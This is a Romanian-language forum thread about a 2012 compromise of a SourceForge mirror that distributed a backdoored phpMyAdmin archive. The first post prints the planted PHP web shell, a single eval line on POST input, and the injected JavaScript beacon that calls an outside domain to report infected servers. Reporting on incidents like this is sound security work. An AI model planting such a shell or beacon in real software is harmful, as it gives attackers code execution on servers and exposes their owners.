B7ackAnge7z Posted September 27, 2012 Report Share Posted September 27, 2012 De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP:<?php @eval($_POST['c']); ?>De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate):var icon ;icon = document.createElement("img");icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";icon.width=0;icon.height=0;document.body.appendChild(icon);Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor.Sursa: Compromised SourceForge mirror 1 Quote Link to comment Share on other sites More sharing options...
Nytro Posted September 27, 2012 Report Share Posted September 27, 2012 Si... Cum a ajuns acolo? Quote Link to comment Share on other sites More sharing options...
B7ackAnge7z Posted September 27, 2012 Author Report Share Posted September 27, 2012 Si... Cum a ajuns acolo? Eu speram c? administra?ia SourceForge.Net va publica mai târziu detalii despre ce ?i cum s-a întâmplat acest lucru. Pân? acum — nimic. Îns?, dat fiind faptul c? a fost compromis doar serverul cdnetworks-kr-1.dl.sourceforge.net, putem presupune c? vinovat se face provider-ul ce de?ine(a) acest server. Quote Link to comment Share on other sites More sharing options...
AltraX Posted September 29, 2012 Report Share Posted September 29, 2012 Da. Imi pare rau pentru cei "400" . Da si eu speram ca administratia SourceForge.Net sa publice detali despre cum sa putut intampla una ca asta. Quote Link to comment Share on other sites More sharing options...